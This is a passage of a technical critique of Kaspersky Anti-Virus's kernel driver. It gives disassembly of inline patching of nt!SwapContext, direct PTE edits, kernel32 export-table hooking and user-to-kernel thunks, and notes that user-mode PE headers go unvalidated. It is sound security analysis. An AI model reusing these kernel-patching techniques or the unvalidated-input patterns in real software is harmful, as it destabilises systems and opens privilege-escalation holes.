KAV customers at the mercy of the next Windows update, + which may cause their systems to crash on boot because KAV's hooking code + makes an assumption that has been invalidated about the context-switching + process. + + +Additionally, in order to perform code patching on the kernel, KAV adjusts the +page protections of kernel code to be writable by altering PTE attributes +directly instead of using documented functions (which would have proper locking +semantics for accessing internal memory management structures). + + +KAV nt!SwapContext patching: + + +.text:F82264EA mov eax, 90909090h ; Build the code to be written to nt!SwapContext +.text:F82264EF mov [ebp+var_38], eax +.text:F82264F2 mov [ebp+var_34], eax +.text:F82264F5 mov [ebp+var_30], ax +.text:F82264F9 mov byte ptr [ebp+var_38], 0E9h +.text:F82264FD mov ecx, offset KavSwapContext +.text:F8226502 sub ecx, ebx +.text:F8226504 sub ecx, 5 +.text:F8226507 mov [ebp+var_38+1], ecx +.text:F822650A mov ecx, [ebp+var_1C] +.text:F822650D lea edx, [ecx+ebx] +.text:F8226510 mov dword_F8228338, edx +.text:F8226516 mov esi, ebx +.text:F8226518 mov edi, offset unk_F8227DBC +.text:F822651D mov eax, ecx +.text:F822651F shr ecx, 2 +.text:F8226522 rep movsd +.text:F8226524 mov ecx, eax +.text:F8226526 and ecx, 3 +.text:F8226529 rep movsb +.text:F822652B lea ecx, [ebp+var_48] ; Make nt!SwapContext writable by directly accessing +.text:F822652B ; the PTEs. 
+.text:F822652E push ecx +.text:F822652F push 1 +.text:F8226531 push ebx +.text:F8226532 call ModifyPteAttributes +.text:F8226537 test al, al +.text:F8226539 jz short loc_F8226588 +.text:F822653B mov ecx, offset KavInternalSpinLock +.text:F8226540 call KavSpinLockAcquire ; Disable interrupts +.text:F8226545 mov ecx, [ebp+var_1C] ; Write to kernel code +.text:F8226548 lea esi, [ebp+var_38] +.text:F822654B mov edi, ebx +.text:F822654D mov edx, ecx +.text:F822654F shr ecx, 2 +.text:F8226552 rep movsd +.text:F8226554 mov ecx, edx +.text:F8226556 and ecx, 3 +.text:F8226559 rep movsb +.text:F822655B mov edx, eax +.text:F822655D mov ecx, offset KavInternalSpinLock +.text:F8226562 call KavSpinLockRelease ; Reenable interrupts +.text:F8226567 lea eax, [ebp+var_48] ; Restore the original PTE attributes. +.text:F822656A push eax +.text:F822656B mov ecx, [ebp+var_48] +.text:F822656E push ecx +.text:F822656F push ebx +.text:F8226570 call ModifyPteAttributes +.text:F8226575 mov al, 1 +.text:F8226577 mov ecx, [ebp+var_10] +.text:F822657A mov large fs:0, ecx +.text:F8226581 pop edi +.text:F8226582 pop esi +.text:F8226583 pop ebx +.text:F8226584 mov esp, ebp +.text:F8226586 pop ebp +.text:F8226587 retn + + +KavSpinLockAcquire subroutine (disables interrupts): + + +.text:F8221240 KavSpinLockAcquire proc near ; CODE XREF: sub_F8225690+D7p +.text:F8221240 ; sub_F8225D50+8Cp ... +.text:F8221240 pushf +.text:F8221241 pop eax +.text:F8221242 +.text:F8221242 loc_F8221242: ; CODE XREF: KavSpinLockAcquire+13j +.text:F8221242 cli +.text:F8221243 lock bts dword ptr [ecx], 0 +.text:F8221248 jb short loc_F822124B +.text:F822124A retn +.text:F822124B ; --------------------------------------------------------------------------- +.text:F822124B +.text:F822124B loc_F822124B: ; CODE XREF: KavSpinLockAcquire+8j +.text:F822124B push eax +.text:F822124C popf +.text:F822124D +.text:F822124D loc_F822124D: ; CODE XREF: KavSpinLockAcquire+17j +.text:F822124D test dword ptr [ecx], 1 +.text:F8221253 jz short loc_F8221242 +.text:F8221255 pause +.text:F8221257 jmp short loc_F822124D +.text:F8221257 KavSpinLockAcquire endp + + +KavSpinLockRelease subroutine (reenables interrupts): + + +.text:F8221260 KavSpinLockRelease proc near ; CODE XREF: sub_F8225690+F2p +.text:F8221260 ; sub_F8225D50+BAp ... +.text:F8221260 mov dword ptr [ecx], 0 +.text:F8221266 push edx +.text:F8221267 popf +.text:F8221268 retn +.text:F8221268 KavSpinLockRelease endp + + + + +ModifyPteAttributes subroutine: + + +.text:F82203C0 ModifyPteAttributes proc near ; CODE XREF: sub_F821A9D0+91p +.text:F82203C0 ; sub_F8220950+43p ... 
+.text:F82203C0 +.text:F82203C0 var_24 = dword ptr -24h +.text:F82203C0 var_20 = byte ptr -20h +.text:F82203C0 var_1C = dword ptr -1Ch +.text:F82203C0 var_18 = dword ptr -18h +.text:F82203C0 var_10 = dword ptr -10h +.text:F82203C0 var_4 = dword ptr -4 +.text:F82203C0 arg_0 = dword ptr 8 +.text:F82203C0 arg_4 = byte ptr 0Ch +.text:F82203C0 arg_8 = dword ptr 10h +.text:F82203C0 +.text:F82203C0 push ebp +.text:F82203C1 mov ebp, esp +.text:F82203C3 push 0FFFFFFFFh +.text:F82203C5 push offset dword_F8212180 +.text:F82203CA push offset _except_handler3 +.text:F82203CF mov eax, large fs:0 +.text:F82203D5 push eax +.text:F82203D6 mov large fs:0, esp +.text:F82203DD sub esp, 14h +.text:F82203E0 push ebx +.text:F82203E1 push esi +.text:F82203E2 push edi +.text:F82203E3 mov [ebp+var_18], esp +.text:F82203E6 xor ebx, ebx +.text:F82203E8 mov [ebp+var_20], bl +.text:F82203EB mov esi, [ebp+arg_0] +.text:F82203EE mov ecx, esi +.text:F82203F0 call KavGetEflags +.text:F82203F5 push esi +.text:F82203F6 call KavGetPte ; This is a function pointer filled in at runtime, +.text:F82203F6 ; differing based on whether the system has PAE +.text:F82203F6 ; enabled or not. +.text:F82203FC mov edi, eax +.text:F82203FE mov [ebp+var_1C], edi +.text:F8220401 cmp edi, 0FFFFFFFFh +.text:F8220404 jz short loc_F8220458 +.text:F8220406 mov [ebp+var_4], ebx +.text:F8220409 mov ecx, esi +.text:F822040B call KavGetEflags +.text:F8220410 mov eax, [edi] +.text:F8220412 test al, 1 +.text:F8220414 jz short loc_F8220451 +.text:F8220416 mov ecx, eax +.text:F8220418 mov [ebp+var_24], ecx +.text:F822041B cmp [ebp+arg_4], bl +.text:F822041E jz short loc_F8220429 +.text:F8220420 mov eax, [ebp+var_1C] +.text:F8220423 lock or dword ptr [eax], 2 +.text:F8220427 jmp short loc_F8220430 +.text:F8220429 ; --------------------------------------------------------------------------- +.text:F8220429 +.text:F8220429 loc_F8220429: ; CODE XREF: ModifyPteAttributes+5Ej +.text:F8220429 mov eax, [ebp+var_1C] +.text:F822042C lock and dword ptr [eax], 0FFFFFFFDh +.text:F8220430 +.text:F8220430 loc_F8220430: ; CODE XREF: ModifyPteAttributes+67j +.text:F8220430 mov eax, [ebp+arg_8] +.text:F8220433 cmp eax, ebx +.text:F8220435 jz short loc_F822043C +.text:F8220437 and ecx, 2 +.text:F822043A mov [eax], cl +.text:F822043C +.text:F822043C loc_F822043C: ; CODE XREF: ModifyPteAttributes+75j +.text:F822043C mov [ebp+var_20], 1 +.text:F8220440 mov eax, [ebp+arg_0] +.text:F8220443 invlpg byte ptr [eax] +.text:F8220446 jmp short loc_F8220451 +.text:F8220448 ; --------------------------------------------------------------------------- +.text:F8220448 +.text:F8220448 loc_F8220448: ; DATA XREF: .text:F8212184o +.text:F8220448 mov eax, 1 +.text:F822044D retn +.text:F822044E ; --------------------------------------------------------------------------- +.text:F822044E +.text:F822044E loc_F822044E: ; DATA XREF: .text:F8212188o +.text:F822044E mov esp, [ebp-18h] +.text:F8220451 +.text:F8220451 loc_F8220451: ; CODE XREF: ModifyPteAttributes+54j +.text:F8220451 ; ModifyPteAttributes+86j +.text:F8220451 mov [ebp+var_4], 0FFFFFFFFh +.text:F8220458 +.text:F8220458 loc_F8220458: ; CODE XREF: ModifyPteAttributes+44j +.text:F8220458 mov al, [ebp+var_20] +.text:F822045B mov ecx, [ebp+var_10] +.text:F822045E mov large fs:0, ecx +.text:F8220465 pop edi +.text:F8220466 pop esi +.text:F8220467 pop ebx +.text:F8220468 mov esp, ebp +.text:F822046A pop ebp +.text:F822046B retn 0Ch +.text:F822046B ModifyPteAttributes endp + + +2.6. 
Allowing user mode code to access kernel memory directly from user mode, + improper validation of user mode structures. + +One of the most important principles of the kernel/user division that modern +operating systems enforce is that user mode is not allowed to directly access +kernel mode memory. This is necessary to enforce system stability, otherwise +a buggy user mode program could corrupt the kernel and bring down the whole +system. + +Unfortunately, the KAV programmers appear to think that this distinction is not +really so important after all. + +One of the strangest of the unsafe practicies implemented by KAV is to allow +user mode to directly call some portions of their kernel driver (within kernel +address space!) instead of just loading a user mode DLL (or otherwise loading +user mode code in the target process). + +This mechanism appears to be used to inspect DLLs as they are loaded - a task +which would be much better accomplished with PsSetLoadImageNotifyRoutine. + +KAV patches kernel32.dll as a new process is created, such that the export +table points all of the DLL-loading routines (e.g. LoadLibraryA) to a thunk +that calls portions of KAV's driver in kernel mode. Additionally, KAV modifes +protections on parts of its code and data sections to allow user mode read +access. + +KAV sets a PsLoadImageNotifyRoutine hook to detect kernel32.dll being loaded in +order to know when to patch kernel32's export table. The author wonders why +KAV did not just do their work from within PsSetLoadImageNotifyRoutine directly +instead of going through all the trouble to allow user mode to call kernel mode +for a LoadLibrary hook. + + +The CheckInjectCodeForNewProcess function is called when a new process loads an +image, and checks for kernel32 being loaded. If this is the case, it will +queue an APC to the process that will perform patching. 
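+
+For comparison with KAV's approach, which is disassembled below, the
+documented route the author refers to above requires very little driver
+code.  The following sketch is illustrative only (the routine names are
+hypothetical), and it merely logs image loads rather than patching anything:
+
+#include <ntddk.h>
+
+//
+// Hypothetical load-image callback: invoked by the kernel in the context of
+// the process into which an image is being mapped.
+//
+VOID
+SampleLoadImageNotify(
+    IN PUNICODE_STRING FullImageName,   // may be NULL
+    IN HANDLE ProcessId,                // zero for driver loads
+    IN PIMAGE_INFO ImageInfo
+    )
+{
+    UNREFERENCED_PARAMETER(ImageInfo);
+
+    //
+    // A real consumer would check for kernel32.dll here and perform its
+    // per-process work directly - no export table patching and no
+    // user-to-kernel thunks are required simply to observe DLL loads.
+    //
+    if (FullImageName != NULL)
+        DbgPrint("Image %wZ mapped into process %p\n",
+                 FullImageName, ProcessId);
+}
+
+//
+// Registration, typically performed from DriverEntry.
+//
+NTSTATUS
+RegisterSampleLoadImageNotify(
+    VOID
+    )
+{
+    return PsSetLoadImageNotifyRoutine(SampleLoadImageNotify);
+}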
+ + +.text:F82218B0 ; int __stdcall CheckInjectCodeForNewProcess(wchar_t *,PUCHAR ImageBase) +.text:F82218B0 CheckInjectCodeForNewProcess proc near ; CODE XREF: KavLoadImageNotifyRoutine+B5p +.text:F82218B0 ; KavDoKernel32Check+41p +.text:F82218B0 +.text:F82218B0 arg_0 = dword ptr 4 +.text:F82218B0 ImageBase = dword ptr 8 +.text:F82218B0 +.text:F82218B0 mov al, byte_F82282F9 +.text:F82218B5 push esi +.text:F82218B6 test al, al +.text:F82218B8 push edi +.text:F82218B9 jz short loc_F8221936 +.text:F82218BB mov eax, [esp+8+arg_0] +.text:F82218BF push offset aKernel32_dll ; "kernel32.dll" +.text:F82218C4 push eax ; wchar_t * +.text:F82218C5 call ds:_wcsicmp +.text:F82218CB add esp, 8 +.text:F82218CE test eax, eax +.text:F82218D0 jnz short loc_F8221936 +.text:F82218D2 mov al, g_FoundKernel32Exports +.text:F82218D7 mov edi, [esp+8+ImageBase] +.text:F82218DB test al, al +.text:F82218DD jnz short KavInitializePatchApcLabel +.text:F82218DF push edi +.text:F82218E0 call KavCheckFindKernel32Exports +.text:F82218E5 test al, al +.text:F82218E7 jz short loc_F8221936 +.text:F82218E9 +.text:F82218E9 KavInitializePatchApcLabel: ; CODE XREF: CheckInjectCodeForNewProcess+2Dj +.text:F82218E9 push '3SeB' ; Tag +.text:F82218EE push 30h ; NumberOfBytes +.text:F82218F0 push 0 ; PoolType +.text:F82218F2 call ds:ExAllocatePoolWithTag +.text:F82218F8 mov esi, eax +.text:F82218FA test esi, esi +.text:F82218FC jz short loc_F8221936 +.text:F82218FE push edi +.text:F82218FF push 0 +.text:F8221901 push offset KavPatchNewProcessApcRoutine +.text:F8221906 push offset loc_F82218A0 +.text:F822190B push offset loc_F8221890 +.text:F8221910 push 0 +.text:F8221912 call KeGetCurrentThread +.text:F8221917 push eax +.text:F8221918 push esi +.text:F8221919 call KeInitializeApc +.text:F822191E push 0 +.text:F8221920 push 0 +.text:F8221922 push 0 +.text:F8221924 push esi +.text:F8221925 call KeInsertQueueApc +.text:F822192B test al, al +.text:F822192D jnz short loc_F822193D +.text:F822192F push esi ; P +.text:F8221930 call ds:ExFreePool +.text:F8221936 +.text:F8221936 loc_F8221936: ; CODE XREF: CheckInjectCodeForNewProcess+9j +.text:F8221936 ; CheckInjectCodeForNewProcess+20j ... +.text:F8221936 pop edi +.text:F8221937 xor al, al +.text:F8221939 pop esi +.text:F822193A retn 8 +.text:F822193D ; --------------------------------------------------------------------------- +.text:F822193D +.text:F822193D loc_F822193D: ; CODE XREF: CheckInjectCodeForNewProcess+7Dj +.text:F822193D pop edi +.text:F822193E mov al, 1 +.text:F8221940 pop esi +.text:F8221941 retn 8 + + +The APC routine itself patches kernel32's export table (and generates the +thunks to call kernel mode) and adjusts PTE attributes on KAV's driver image +to allow user mode access. 
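+
+Before looking at that APC routine's disassembly, it is worth noting as an
+aside that when a driver legitimately needs to expose one of its buffers to
+user mode, there is a documented pattern for doing so that does not involve
+rewriting PTEs by hand.  The sketch below is only illustrative (the helper
+name is hypothetical); it maps driver-owned data, not code, and must be
+called in the context of the target process:
+
+#include <ntddk.h>
+
+//
+// Hypothetical helper: map a nonpaged buffer owned by the driver into the
+// current process's user address space via an MDL, rather than making
+// driver pages user-accessible by editing PTE attributes directly.
+//
+NTSTATUS
+MapBufferIntoCurrentProcess(
+    IN PVOID Buffer,            // nonpaged pool allocation
+    IN ULONG Length,
+    OUT PMDL *Mdl,
+    OUT PVOID *UserVa
+    )
+{
+    *Mdl = IoAllocateMdl(Buffer, Length, FALSE, FALSE, NULL);
+
+    if (*Mdl == NULL)
+        return STATUS_INSUFFICIENT_RESOURCES;
+
+    MmBuildMdlForNonPagedPool(*Mdl);
+
+    __try
+    {
+        //
+        // For UserMode mappings this call raises an exception on failure,
+        // so it must be guarded by an exception handler.
+        //
+        *UserVa = MmMapLockedPagesSpecifyCache(*Mdl, UserMode, MmCached,
+                                               NULL, FALSE,
+                                               NormalPagePriority);
+    }
+    __except (EXCEPTION_EXECUTE_HANDLER)
+    {
+        IoFreeMdl(*Mdl);
+        *Mdl = NULL;
+        return GetExceptionCode();
+    }
+
+    return STATUS_SUCCESS;
+}
+
+The mapping is later torn down with MmUnmapLockedPages and IoFreeMdl.  Note
+that this shares data, not executable driver code; there is no supported way
+to let user mode call kernel code directly, which is precisely why KAV's
+thunking scheme has to resort to the tricks shown below.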
+ + +.text:F8221810 KavPatchNewProcessApcRoutine proc near ; DATA XREF: CheckInjectCodeForNewProcess+51o +.text:F8221810 +.text:F8221810 var_8 = dword ptr -8 +.text:F8221810 var_4 = dword ptr -4 +.text:F8221810 ImageBase = dword ptr 8 +.text:F8221810 +.text:F8221810 push ebp +.text:F8221811 mov ebp, esp +.text:F8221813 sub esp, 8 +.text:F8221816 mov eax, [ebp+ImageBase] +.text:F8221819 push esi +.text:F822181A push eax ; ImageBase +.text:F822181B call KavPatchImageForNewProcess +.text:F8221820 mov esi, dword_F8230518 +.text:F8221826 mov eax, dword_F823051C +.text:F822182B and esi, 0FFFFF000h +.text:F8221831 cmp esi, eax +.text:F8221833 mov [ebp+ImageBase], esi +.text:F8221836 jnb short loc_F8221883 +.text:F8221838 +.text:F8221838 loc_F8221838: ; CODE XREF: KavPatchNewProcessApcRoutine+71j +.text:F8221838 push esi +.text:F8221839 call KavPageTranslation0 +.text:F822183F push esi +.text:F8221840 mov [ebp+var_8], eax +.text:F8221843 call KavPageTranslation1 +.text:F8221849 mov [ebp+var_4], eax +.text:F822184C mov eax, [ebp+var_8] +.text:F822184F lock or dword ptr [eax], 4 +.text:F8221853 lock and dword ptr [eax], 0FFFFFEFFh +.text:F822185A mov eax, [ebp+var_4] +.text:F822185D invlpg byte ptr [eax] +.text:F8221860 lock or dword ptr [eax], 4 +.text:F8221864 lock and dword ptr [eax], 0FFFFFEFDh +.text:F822186B mov eax, [ebp+ImageBase] +.text:F822186E invlpg byte ptr [eax] +.text:F8221871 mov eax, dword_F823051C +.text:F8221876 add esi, 1000h +.text:F822187C cmp esi, eax +.text:F822187E mov [ebp+ImageBase], esi +.text:F8221881 jb short loc_F8221838 +.text:F8221883 +.text:F8221883 loc_F8221883: ; CODE XREF: KavPatchNewProcessApcRoutine+26j +.text:F8221883 pop esi +.text:F8221884 mov esp, ebp +.text:F8221886 pop ebp +.text:F8221887 retn 0Ch +.text:F8221887 KavPatchNewProcessApcRoutine endp + + +.text:F8221750 ; int __stdcall KavPatchImageForNewProcess(PUCHAR ImageBase) +.text:F8221750 KavPatchImageForNewProcess proc near ; CODE XREF: KavPatchNewProcessApcRoutine+Bp +.text:F8221750 +.text:F8221750 ImageBase = dword ptr 8 +.text:F8221750 +.text:F8221750 push ebx +.text:F8221751 call ds:KeEnterCriticalRegion +.text:F8221757 mov eax, dword_F82282F4 +.text:F822175C push 1 ; Wait +.text:F822175E push eax ; Resource +.text:F822175F call ds:ExAcquireResourceExclusiveLite +.text:F8221765 push 1 +.text:F8221767 call KavSetPageAttributes1 +.text:F822176C mov ecx, [esp+ImageBase] +.text:F8221770 push ecx ; ImageBase +.text:F8221771 call KavPatchImage +.text:F8221776 push 0 +.text:F8221778 mov bl, al +.text:F822177A call KavSetPageAttributes1 +.text:F822177F mov ecx, dword_F82282F4 ; Resource +.text:F8221785 call ds:ExReleaseResourceLite +.text:F822178B call ds:KeLeaveCriticalRegion +.text:F8221791 mov al, bl +.text:F8221793 pop ebx +.text:F8221794 retn 4 +.text:F8221794 KavPatchImageForNewProcess endp + + +The actual image patching reprotects the export table of kernel32, changes the +export address table entries for the LoadLibrary* family of functions to point +to a thunk that is written into spare space within the kernel32 image, and +writes the actual thunk code out: + + +.text:F8221680 ; int __stdcall KavPatchImage(PUCHAR ImageBase) +.text:F8221680 KavPatchImage proc near ; CODE XREF: KavPatchImageForNewProcess+21p +.text:F8221680 +.text:F8221680 var_C = dword ptr -0Ch +.text:F8221680 FunctionVa = dword ptr -8 +.text:F8221680 var_4 = dword ptr -4 +.text:F8221680 ImageBase = dword ptr 4 +.text:F8221680 +.text:F8221680 mov eax, [esp+ImageBase] +.text:F8221684 sub esp, 0Ch +.text:F8221687 push ebp 
+.text:F8221688 push 3Ch +.text:F822168A push eax +.text:F822168B call KavReprotectExportTable +.text:F8221690 mov ebp, eax +.text:F8221692 test ebp, ebp +.text:F8221694 jnz short loc_F822169F +.text:F8221696 xor al, al +.text:F8221698 pop ebp +.text:F8221699 add esp, 0Ch +.text:F822169C retn 4 +.text:F822169F ; --------------------------------------------------------------------------- +.text:F822169F +.text:F822169F loc_F822169F: ; CODE XREF: KavPatchImage+14j +.text:F822169F push ebx +.text:F82216A0 push esi +.text:F82216A1 push edi +.text:F82216A2 xor ebx, ebx +.text:F82216A4 mov edi, ebp +.text:F82216A6 mov esi, offset ExportedFunctionsToCheckTable +.text:F82216AB +.text:F82216AB CheckNextFunctionInTable: ; CODE XREF: KavPatchImage+B4j +.text:F82216AB mov edx, [esi+0Ch] +.text:F82216AE mov eax, [esp+1Ch+ImageBase] +.text:F82216B2 lea ecx, [esp+1Ch+var_C] +.text:F82216B6 push ecx +.text:F82216B7 push edx +.text:F82216B8 push eax +.text:F82216B9 call LookupExportedFunction +.text:F82216BE test eax, eax +.text:F82216C0 mov [esp+1Ch+FunctionVa], eax +.text:F82216C4 jz short loc_F8221725 +.text:F82216C6 mov edx, [esp+1Ch+var_C] +.text:F82216CA lea ecx, [esp+1Ch+var_4] +.text:F82216CE push ecx +.text:F82216CF push 40h +.text:F82216D1 push 4 +.text:F82216D3 push edx +.text:F82216D4 call KavExecuteNtProtectVirtualMemoryInt2E +.text:F82216D9 test al, al +.text:F82216DB jz short loc_F8221725 +.text:F82216DD cmp dword ptr [esi], 0 +.text:F82216E0 jnz short loc_F82216EF +.text:F82216E2 mov eax, [esp+1Ch+FunctionVa] +.text:F82216E6 mov ecx, [esp+1Ch+var_C] +.text:F82216EA mov [esi], eax +.text:F82216EC mov [esi+8], ecx +.text:F82216EF +.text:F82216EF loc_F82216EF: ; CODE XREF: KavPatchImage+60j +.text:F82216EF mov eax, edi +.text:F82216F1 mov edx, 90909090h +.text:F82216F6 mov [eax], edx +.text:F82216F8 mov [eax+4], edx +.text:F82216FB mov [eax+8], edx +.text:F82216FE mov [eax+0Ch], dx +.text:F8221702 mov [eax+0Eh], dl +.text:F8221705 mov byte ptr [edi], 0E9h +.text:F8221708 mov ecx, [esi+4] +.text:F822170B mov edx, ebx +.text:F822170D sub ecx, ebx +.text:F822170F sub ecx, ebp +.text:F8221711 sub ecx, 5 +.text:F8221714 mov [edi+1], ecx +.text:F8221717 mov ecx, [esp+1Ch+ImageBase] +.text:F822171B mov eax, [esp+1Ch+var_C] +.text:F822171F sub edx, ecx +.text:F8221721 add edx, ebp +.text:F8221723 mov [eax], edx ; +.text:F8221723 ; Patching Export Table here +.text:F8221723 ; e.g. write to 7c802f58 +.text:F8221723 ; (kernel32 EAT entry for LoadLibraryA) +.text:F8221723 ; +.text:F8221723 ; 578 241 00001D77 LoadLibraryA = _LoadLibraryA@4 +.text:F8221723 ; 579 242 00001D4F LoadLibraryExA = _LoadLibraryExA@12 +.text:F8221723 ; 580 243 00001AF1 LoadLibraryExW = _LoadLibraryExW@12 +.text:F8221723 ; 581 244 0000ACD3 LoadLibraryW = _LoadLibraryW@4 +.text:F8221723 ; +.text:F8221723 ; KAV writes a new RVA pointing to its hook code here. 
+.text:F8221725 +.text:F8221725 loc_F8221725: ; CODE XREF: KavPatchImage+44j +.text:F8221725 ; KavPatchImage+5Bj +.text:F8221725 add esi, 10h +.text:F8221728 add ebx, 0Fh +.text:F822172B add edi, 0Fh +.text:F822172E cmp esi, offset byte_F82357E0 +.text:F8221734 jb CheckNextFunctionInTable +.text:F822173A pop edi +.text:F822173B pop esi +.text:F822173C pop ebx +.text:F822173D mov al, 1 +.text:F822173F pop ebp +.text:F8221740 add esp, 0Ch +.text:F8221743 retn 4 +.text:F8221743 KavPatchImage endp + + +KAV's export table reprotecting code assumes that the user mode PE header is +well-formed and does not contain offsets pointing to kernel mode addresses: + + +.text:F8221360 KavReprotectExportTable proc near ; CODE XREF: KavPatchImage+Bp +.text:F8221360 +.text:F8221360 var_10 = dword ptr -10h +.text:F8221360 var_C = dword ptr -0Ch +.text:F8221360 var_8 = dword ptr -8 +.text:F8221360 var_4 = dword ptr -4 +.text:F8221360 arg_0 = dword ptr 4 +.text:F8221360 arg_4 = dword ptr 8 +.text:F8221360 +.text:F8221360 mov eax, [esp+arg_0] +.text:F8221364 sub esp, 10h +.text:F8221367 cmp word ptr [eax], 'ZM' +.text:F822136C push ebx +.text:F822136D push ebp +.text:F822136E push esi +.text:F822136F push edi +.text:F8221370 jnz loc_F8221442 +.text:F8221376 mov esi, [eax+3Ch] +.text:F8221379 add esi, eax +.text:F822137B mov [esp+20h+var_C], esi +.text:F822137F cmp dword ptr [esi], 'EP' +.text:F8221385 jnz loc_F8221442 +.text:F822138B lea eax, [esp+20h+var_8] +.text:F822138F xor edx, edx +.text:F8221391 mov dx, [esi+14h] +.text:F8221395 push eax +.text:F8221396 xor eax, eax +.text:F8221398 push 40h +.text:F822139A mov ax, [esi+6] +.text:F822139E lea ecx, [eax+eax*4] +.text:F82213A1 lea eax, [edx+ecx*8+18h] +.text:F82213A5 push eax +.text:F82213A6 push esi +.text:F82213A7 call KavExecuteNtProtectVirtualMemoryInt2E ; NtProtectVirtualMemory +.text:F82213AC test al, al +.text:F82213AE jz loc_F8221442 +.text:F82213B4 mov ecx, [esi+8] +.text:F82213B7 mov [esp+20h+var_10], 0 +.text:F82213BF inc ecx +.text:F82213C0 mov [esi+8], ecx +.text:F82213C3 xor ecx, ecx +.text:F82213C5 mov cx, [esi+14h] +.text:F82213C9 cmp word ptr [esi+6], 0 +.text:F82213CE lea edi, [ecx+esi+18h] +.text:F82213D2 jbe short loc_F8221442 +.text:F82213D4 mov ebp, [esp+20h+arg_4] +.text:F82213D8 +.text:F82213D8 loc_F82213D8: ; CODE XREF: KavReprotectExportTable+E0j +.text:F82213D8 mov ebx, [edi+10h] +.text:F82213DB test ebx, 0FFFh +.text:F82213E1 jz short loc_F82213EA +.text:F82213E3 or ebx, 0FFFh +.text:F82213E9 inc ebx +.text:F82213EA +.text:F82213EA loc_F82213EA: ; CODE XREF: KavReprotectExportTable+81j +.text:F82213EA mov ecx, [edi+8] +.text:F82213ED mov edx, ebx +.text:F82213EF sub edx, ecx +.text:F82213F1 cmp edx, ebp +.text:F82213F3 jle short loc_F822142C +.text:F82213F5 mov esi, [edi+0Ch] +.text:F82213F8 mov ecx, [esp+20h+arg_0] +.text:F82213FC sub esi, ebp +.text:F82213FE push ebp +.text:F82213FF add esi, ebx +.text:F8221401 add esi, ecx +.text:F8221403 push esi +.text:F8221404 call KavFindSectionName +.text:F8221409 test al, al +.text:F822140B jz short loc_F8221428 +.text:F822140D cmp dword ptr [edi+1], 'TINI' +.text:F8221414 jz short loc_F8221428 +.text:F8221416 lea eax, [esp+20h+var_4] +.text:F822141A push eax +.text:F822141B push 40h +.text:F822141D push ebp +.text:F822141E push esi +.text:F822141F call KavExecuteNtProtectVirtualMemoryInt2E ; NtProtectVirtualMemory +.text:F8221424 test al, al +.text:F8221426 jnz short loc_F822144E +.text:F8221428 +.text:F8221428 loc_F8221428: ; CODE XREF: KavReprotectExportTable+ABj +.text:F8221428 ; 
KavReprotectExportTable+B4j +.text:F8221428 mov esi, [esp+20h+var_C] +.text:F822142C +.text:F822142C loc_F822142C: ; CODE XREF: KavReprotectExportTable+93j +.text:F822142C mov eax, [esp+20h+var_10] +.text:F8221430 xor ecx, ecx +.text:F8221432 mov cx, [esi+6] +.text:F8221436 add edi, 28h +.text:F8221439 inc eax +.text:F822143A cmp eax, ecx +.text:F822143C mov [esp+20h+var_10], eax +.text:F8221440 jb short loc_F82213D8 +.text:F8221442 +.text:F8221442 loc_F8221442: ; CODE XREF: KavReprotectExportTable+10j +.text:F8221442 ; KavReprotectExportTable+25j ... +.text:F8221442 pop edi +.text:F8221443 pop esi +.text:F8221444 pop ebp +.text:F8221445 xor eax, eax +.text:F8221447 pop ebx +.text:F8221448 add esp, 10h +.text:F822144B retn 8 +.text:F822144E ; --------------------------------------------------------------------------- +.text:F822144E +.text:F822144E loc_F822144E: ; CODE XREF: KavReprotectExportTable+C6j +.text:F822144E mov eax, [edi+8] +.text:F8221451 mov [edi+10h], ebx +.text:F8221454 add eax, ebp +.text:F8221456 mov [edi+8], eax +.text:F8221459 mov eax, esi +.text:F822145B pop edi +.text:F822145C pop esi +.text:F822145D pop ebp +.text:F822145E pop ebx +.text:F822145F add esp, 10h +.text:F8221462 retn 8 +.text:F8221462 KavReprotectExportTable endp + + +The mechanism by which KAV uses to reprotect user mode code is rather much of +a hack as well. KAV dynamically determines the system call ordinal of the +NtProtectVirtualMemory system service and uses its own int 2e thunk to call the +service. + + +.text:F8221320 KavExecuteNtProtectVirtualMemoryInt2E proc near +.text:F8221320 ; CODE XREF: KavReprotectExportTable+47p +.text:F8221320 ; KavReprotectExportTable+BFp ... +.text:F8221320 +.text:F8221320 arg_0 = dword ptr 4 +.text:F8221320 arg_4 = dword ptr 8 +.text:F8221320 arg_8 = dword ptr 0Ch +.text:F8221320 arg_C = dword ptr 10h +.text:F8221320 +.text:F8221320 mov eax, [esp+arg_0] +.text:F8221324 mov ecx, [esp+arg_C] +.text:F8221328 mov edx, [esp+arg_8] +.text:F822132C push ebx +.text:F822132D mov [esp+4+arg_0], eax +.text:F8221331 push ecx +.text:F8221332 lea eax, [esp+8+arg_4] +.text:F8221336 push edx +.text:F8221337 mov edx, NtProtectVirtualMemoryOrdinal +.text:F822133D lea ecx, [esp+0Ch+arg_0] +.text:F8221341 push eax +.text:F8221342 push ecx +.text:F8221343 push 0FFFFFFFFh +.text:F8221345 push edx +.text:F8221346 xor bl, bl +.text:F8221348 call KavInt2E +.text:F822134D test eax, eax +.text:F822134F mov al, 1 +.text:F8221351 jge short loc_F8221355 +.text:F8221353 mov al, bl +.text:F8221355 +.text:F8221355 loc_F8221355: ; CODE XREF: KavExecuteNtProtectVirtualMemoryInt2E+31j +.text:F8221355 pop ebx +.text:F8221356 retn 10h +.text:F8221356 KavExecuteNtProtectVirtualMemoryInt2E endp + + +.user:F8231090 KavInt2E proc near ; CODE XREF: KavExecuteNtProtectVirtualMemoryInt2E+28p +.user:F8231090 +.user:F8231090 arg_0 = dword ptr 8 +.user:F8231090 arg_4 = dword ptr 0Ch +.user:F8231090 +.user:F8231090 push ebp +.user:F8231091 mov ebp, esp +.user:F8231093 mov eax, [ebp+arg_0] +.user:F8231096 lea edx, [ebp+arg_4] +.user:F823109C int 2Eh +.user:F823109C +.user:F823109E pop ebp +.user:F823109F retn 18h +.user:F823109F KavInt2E endp +.user:F823109F + + +KAV's export lookup code does not correctly validate offsets garnered from the +PE header before using them: + + +.text:F8220CA0 LookupExportedFunction proc near ; CODE XREF: sub_F8217A60+C9p +.text:F8220CA0 ; sub_F82181D0+Dp ... 
